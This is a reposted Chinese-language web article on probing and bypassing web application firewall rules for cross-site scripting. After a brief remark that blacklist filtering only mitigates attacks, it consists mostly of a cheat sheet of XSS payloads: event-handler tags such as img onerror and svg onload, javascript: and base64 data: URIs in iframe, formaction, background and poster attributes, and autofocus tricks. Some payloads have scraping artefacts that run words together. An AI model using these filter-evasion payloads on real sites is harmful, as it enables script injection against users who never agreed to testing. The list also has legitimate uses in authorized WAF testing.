XSS现代WAF规则探测及绕过技能
发布时间:2022-05-09 09:01:23 所属栏目:安全 来源:互联网
导读:黑名单方式永远不是最好的解决办法,但是相对与白名单效率很高,对于WAF供应商来说,最好的实践如下:开发者和管理员要注意WAF只能缓解攻击,并且针对已知的弱点的防护只是和源代码修复的方法打个时间差 复制 1、使用无害的payload,类似b,i,u观察响应,判断
|
测试其他标签 src属性 复制 <img src=x onerror=prompt(1);> <img/src=aaa.jpg onerror=prompt(1); <video src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);> iframe 复制 <iframesrc="javascript:alert(2)"> <iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> Embed 复制 <formaction='data:text/html,<script>alert(1)</script>'><button>CLICK “formaction”属性 复制 <isindexformaction="javascript:alert(1)" type=image> <input type="image" formaction=JaVaScript:alert(0)> <form><button formaction=javascript:alert(1)>CLICKME “background”属性 复制 <table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6 “posters” 属性 复制 <video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5 “data”属性 复制 <svg/onload=prompt(1);> <marquee/onstart=confirm(2)>/ <body onload=prompt(1);> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)"> (编辑:宁德站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐